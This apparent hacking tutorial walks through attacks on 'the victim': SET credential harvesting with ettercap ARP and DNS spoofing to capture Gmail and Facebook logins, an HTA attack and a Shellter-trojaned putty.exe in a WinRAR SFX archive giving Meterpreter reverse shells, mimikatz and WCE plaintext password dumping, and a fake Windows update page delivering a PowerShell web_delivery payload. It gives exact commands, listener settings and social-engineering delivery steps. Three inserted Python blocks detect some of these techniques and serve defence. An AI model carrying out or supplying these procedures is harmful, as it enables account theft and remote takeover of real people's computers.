Hack Gmail and Facebook of Remote PC using DNS Spoofing and SET Toolkit.

First, open the Applications menu in Kali Linux, go to Exploitation Tools, and choose SET Toolkit.


Now choose option 1, “Social – Engineering Attacks”, and press Enter.


Then choose option 2, “Website Attack Vectors”, and press Enter.


After that, choose option 3, “Credential Harvester Attack Method”, and press Enter.


Now choose option 2, “Site Cloner”, and press Enter.


For the post back, type your IP address and press Enter. After that, type the name of the website you want to clone (in my case I am using Gmail).


The cloned web page is saved in the /var/www folder, as shown below.


Now move the cloned files of the fake page (e.g. harvester, post and index.html) into the /var/www/html folder.


Now right-click on the harvester .txt file and give it read and write permission.


Now open etter.dns file which is in /etc/ettercap folder.


Modify the contents of etter.dns and add your own PC's IP address as an A record.


Now Open Ettercap and go to Sniff and choose Unified sniffing.


Select your network interface (in my case the interface is eth0).


Now go to Hosts and select Scan for hosts. It will show you the PCs connected to your network.


Select Host list and select your target, then click on Add to Target 1 (if you want to select more than one target, select the next target and click on Add to Target again).


Open Mitm option and select ARP poisoning...


It will give you a pop-up in which you select the Sniff remote connections box and hit OK.


Select Plugins and choose Manage the plugins.


In the Plugins option, double-click on dns_spoof. (It will start DNS spoofing.)

Click on Start and select Start sniffing.


Now, when the victim opens any web page, they will be redirected to the fake page you created.
When the victim enters their ID and password, you will get all the details.


The victim's ID and password will be saved in /var/www/html/harvester.txt, as shown below.
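
From the defender's side, both halves of this procedure leave traces on the targeted client: ARP poisoning makes the gateway and another host share one MAC address, and the etter.dns A record makes a public name resolve to a LAN address. The Python check below is an added example, not part of the original post; the `ip neigh show` output, the DNS answers, the addresses and the internal suffixes are constructed sample data and assumptions.

```python
import ipaddress
from collections import defaultdict

# Constructed `ip neigh show` output from a client during ARP poisoning:
# the gateway (.1) and another host (.125) share one MAC address.
SAMPLE_NEIGH = """\
192.168.0.1 dev eth0 lladdr 08:00:27:aa:bb:cc REACHABLE
192.168.0.125 dev eth0 lladdr 08:00:27:aa:bb:cc REACHABLE
192.168.0.110 dev eth0 lladdr 52:54:00:12:34:56 STALE
192.168.0.111 dev eth0  FAILED
"""

# Constructed (queried name, returned A record) pairs seen by the same client.
SAMPLE_ANSWERS = [
    ("accounts.google.com", "192.168.0.125"),
    ("www.example.org", "93.184.216.34"),
    ("printer.corp.internal", "192.168.0.40"),
]

def find_arp_conflicts(neigh_text):
    """Return {mac: [ips]} for every MAC that answers for more than one IP."""
    by_mac = defaultdict(list)
    for line in neigh_text.splitlines():
        fields = line.split()
        if "lladdr" not in fields:
            continue  # FAILED/INCOMPLETE entries carry no MAC
        mac = fields[fields.index("lladdr") + 1].lower()
        by_mac[mac].append(fields[0])
    # One MAC for several IPs can be legitimate (multi-homed router), so review hits.
    return {mac: sorted(ips) for mac, ips in by_mac.items() if len(ips) > 1}

def find_spoofed_answers(answers, internal_suffixes=(".internal", ".local")):
    """Flag public names whose A record is a private (RFC 1918) address."""
    flagged = []
    for name, addr in answers:
        if name.lower().endswith(internal_suffixes):
            continue  # internal zones legitimately resolve to private space
        if ipaddress.ip_address(addr).is_private:
            flagged.append((name, addr))
    return flagged

if __name__ == "__main__":
    for mac, ips in find_arp_conflicts(SAMPLE_NEIGH).items():
        print(f"ARP conflict: {mac} claims {', '.join(ips)}")
    for name, addr in find_spoofed_answers(SAMPLE_ANSWERS):
        print(f"Suspicious DNS answer: {name} -> {addr}")
```

On a switched network, the same conditions are what dynamic ARP inspection and DNS monitoring at the resolver are meant to catch before a client ever sees them.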

Hack Remote PC using HTA Attack in SET Toolkit

The HTA Attack method will allow you to clone a site and perform powershell injection through HTA files which can be used for Windows-based powershell exploitation through the browser.


First, open the Applications menu in Kali Linux, go to Post Exploitation, and choose SET Toolkit.


Now choose option 1, “Social – Engineering Attacks”.


Now choose option 2, “Website Attack Vectors”.


Now choose option 8, “HTA Attack Method”.


Enter the IP address to connect back on: 192.168.0.125 (IP address of Your PC)

Now select the payload; I chose 1, Meterpreter reverse TCP.


Now we will choose option 2, “Site Cloner”, and type the name of the site you want to clone. The MSF listener starts automatically.


Now you will get index.html and launcher.hta in /var/www directory.


Now move both files to the /var/www/html directory.


Now convert your URL into a Bitly URL using bit.ly and send this link to your victim via email or chat.


When the victim machine browses to the Bitly URL, it will show a prompt to Keep/Discard.


Now you will get the meterpreter of the victim PC. Type sessions -l to display the sessions opened when the victim opens the link.

Now that the session has opened, type sysinfo to get system information, then type shell to enter the victim's command prompt.

Hack Windows Password in Clear Text using Mimikatz and Windows credential Editor

mimikatz is a tool to check Windows security. It's now well known to extract plaintexts passwords, hash, PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash, pass-the-ticket or build Golden tickets.


First download the Windows version of mimikatz from here, then right-click on it and run it as Administrator.


It will open the mimikatz window.


Type the following command to check the privilege:
privilege::debug


Now type the following command to get users passwords in text mode.
sekurlsa::logonPasswords


Windows Credential Editor

Windows Credentials Editor (WCE) is a security tool that allows to list Windows logon sessions and add, change, list and delete associated credentials (e.g.: LM/NT hashes, Kerberos tickets and clear text passwords).

First download WCE from here.
Go to the WCE directory and run the following command as Administrator:
wce.exe -w
It will show the password in plaintext.
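
Both tools in this section work by reading the memory of the LSASS process, which Sysmon records as Event ID 10 (ProcessAccess). The Python filter below is an added example, not part of the original post; the event records, file paths, access masks and the allowlist are constructed for illustration.

```python
PROCESS_VM_READ = 0x0010  # Windows access right needed to read another process's memory

# Assumption: software this site expects to read LSASS memory (lower-case full paths).
ALLOWED_SOURCES = {r"c:\program files\windows defender\msmpeng.exe"}

# Constructed Sysmon Event ID 10 records, reduced to the fields used here.
SAMPLE_EVENTS = [
    {"EventID": 10, "SourceImage": r"C:\Users\bob\Desktop\mimikatz.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010"},
    {"EventID": 10, "SourceImage": r"C:\Tools\wce.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1438"},
    {"EventID": 10, "SourceImage": r"C:\Program Files\Windows Defender\MsMpEng.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1410"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\svchost.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1000"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\taskmgr.exe",
     "TargetImage": r"C:\Windows\System32\notepad.exe", "GrantedAccess": "0x1410"},
]

def lsass_memory_reads(events, allowed=ALLOWED_SOURCES):
    """Return (source, access) for non-allowlisted processes that opened LSASS for reading."""
    alerts = []
    for ev in events:
        if ev.get("EventID") != 10:
            continue
        if not ev["TargetImage"].lower().endswith(r"\lsass.exe"):
            continue
        access = int(ev["GrantedAccess"], 16)
        if not access & PROCESS_VM_READ:
            continue  # query-only handles cannot read credential material
        source = ev["SourceImage"].lower()
        if source not in allowed:
            alerts.append((source, hex(access)))
    return alerts

if __name__ == "__main__":
    for source, access in lsass_memory_reads(SAMPLE_EVENTS):
        print(f"LSASS memory read by {source} (GrantedAccess {access})")
```

Detection pairs with hardening: running LSASS as a protected process (the RunAsPPL value under HKLM\SYSTEM\CurrentControlSet\Control\Lsa) and keeping WDigest's UseLogonCredential at 0 limit what such a read can return.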

Hack Remote PC using WinRAR SFX Remote Code Execution Vulnerability

A remote code execution vulnerability has been discovered in the official WinRAR SFX v5.21 software. The vulnerability allows remote attackers to execute system-specific code without authorization to compromise a target system.

The issue is located in the `Text and Icon` function of the `Text to display in SFX window` module. Remote attackers are able to generate their own compressed archives with malicious payloads that execute system-specific code to compromise the target.

Download Shellter from here. This is the latest release of Shellter, and no antivirus has detected it so far. After downloading Shellter, unzip the archive file.


Change to the Shellter directory and type “wine shellter.exe”.


A terminal opens; choose the operation mode auto (a).


Now choose an executable file and copy it to the Shellter folder so that Shellter can bind to it.
In my case I have copied putty.exe as the file to bind with shellter.exe.

Note: only executable files can be bound.


After you choose the operation mode, it asks for the PE target. Give the filename of the .exe and the binding process will start.


When prompted to enable stealth mode, enter “Y”.


When the binding has been processed, it will ask for the type of payload to use. I chose l for a listed payload and then 1 for Meterpreter_reverse_tcp.

Now give the lhost, which is the IP address of Kali Linux, and the lport as 4444.


After giving all the options you will get a confirmation like Injection: verified! Press enter to continue.


Now you will get the encrypted putty.exe file in the Shellter directory.


Move the putty.exe file to the /var/www/html directory.


Start apache services.


Now patch the putty.exe path in the WinRAR utility. Right-click on WinRAR and select the Add to archive option.


Select the Create SFX archive option.


Click on Advanced and then on SFX options.


Now select the Text and Icon option and type the path of the putty.exe file with an iframe tag, as follows.
Click on OK.


Now send this Winrar file to victim PC using any Social Engineering Technique.


Now we need to set up a listener to handle the reverse connection sent by the victim when the exploit is successfully executed.

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.5
exploit

Now send your putty.exe file to the victim using any social engineering technique. When the victim uses putty, you will get the meterpreter of the victim PC.

Hack Remote PC using Fake Updates Scam with Ettercap and Metasploit

First of all, go to the Kali Linux home directory. Move to the /etc/ettercap directory. Now edit the etter.dns file.


Modify the contents of etter.dns and add your own PC's IP address as an A record.


Now run the following command with the victim PC's IP address to spoof the victim PC.
ettercap -i eth0 -T -q -P dns_spoof -M ARP /192.168.0.103.//


It will activate dns_spoof plug-in.


Open terminal and type msfconsole to open metasploit

Now type use exploit/multi/script/web_delivery
msf exploit (web_delivery)>set lhost 192.168.0.125 (IP of Local Host)
msf exploit (web_delivery)>set lport 4444
msf exploit (web_delivery)>set target 2
msf exploit (web_delivery)>set payload windows/meterpreter/reverse_tcp
msf exploit (web_delivery)>exploit


Now copy this Powershell.exe code and save it as an update.bat file.


Now create a fake website page showing a Windows security update message. In the web page, give the hyperlink as the update.bat file.


Now save this web page as index.html and paste it in the directory /var/www/html.


Now start the Apache server with the following command:
service apache2 start


When the victim opens any website, this page showing the Windows security update message will be displayed.
When the victim clicks on the download update link and saves the batch file, the batch file will execute automatically.



Now you will get control of the victim PC. Type sessions -l to display the sessions opened when the victim opens the link.

Now that the session has opened, type sysinfo to get system information, then type shell to enter the victim's command prompt.
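
Both the HTA procedure earlier on this page and the fake-update batch file above end with PowerShell being started by an unusual parent process, which process-creation logging records. The Python triage below is an added example, not part of the original post; the Sysmon Event ID 1 records, user name, paths and address are constructed, and the regular expressions cover only common spellings of the options.

```python
import re
from pathlib import PureWindowsPath

HIDDEN = re.compile(r"-w(in(dowstyle)?)?\s+hidden", re.I)  # common spellings only
DOWNLOAD = re.compile(r"net\.webclient|downloadstring|https?://", re.I)
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed Sysmon Event ID 1 (process creation) records; 192.0.2.10 is a documentation address.
SAMPLE_EVENTS = [
    {"Image": PS,
     "CommandLine": "powershell.exe -nop -w hidden -e <encoded blob omitted>",
     "ParentImage": r"C:\Windows\System32\mshta.exe",
     "ParentCommandLine": r'mshta.exe "C:\Users\bob\Downloads\launcher.hta"'},
    {"Image": PS,
     "CommandLine": "powershell.exe -nop -w hidden -c (New-Object Net.WebClient)"
                    ".DownloadString('http://192.0.2.10:8080/a')",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "ParentCommandLine": r'cmd.exe /c "C:\Users\bob\Downloads\update.bat"'},
    {"Image": PS,
     "CommandLine": r"powershell.exe -File C:\Scripts\backup.ps1",
     "ParentImage": r"C:\Windows\explorer.exe",
     "ParentCommandLine": r"C:\Windows\explorer.exe"},
]

def name(path):
    """Lower-case file name of a Windows path, independent of the analysis host's OS."""
    return PureWindowsPath(path).name.lower()

def triage(ev):
    """Return the reasons (possibly none) why one process-creation event is suspicious."""
    reasons = []
    image, parent = name(ev["Image"]), name(ev["ParentImage"])
    if parent == "mshta.exe" and image in ("powershell.exe", "cmd.exe"):
        reasons.append("shell spawned by mshta.exe")
    if image == "powershell.exe" and HIDDEN.search(ev["CommandLine"]):
        if DOWNLOAD.search(ev["CommandLine"]):
            reasons.append("hidden PowerShell fetching remote content")
        if ".bat" in ev["ParentCommandLine"].lower():
            reasons.append("hidden PowerShell started from a batch file")
    return reasons

def detect(events):
    """Return [(index, reasons)] for every event with at least one reason."""
    return [(i, r) for i, ev in enumerate(events) if (r := triage(ev))]

if __name__ == "__main__":
    for index, reasons in detect(SAMPLE_EVENTS):
        print(f"event {index}: {'; '.join(reasons)}")
```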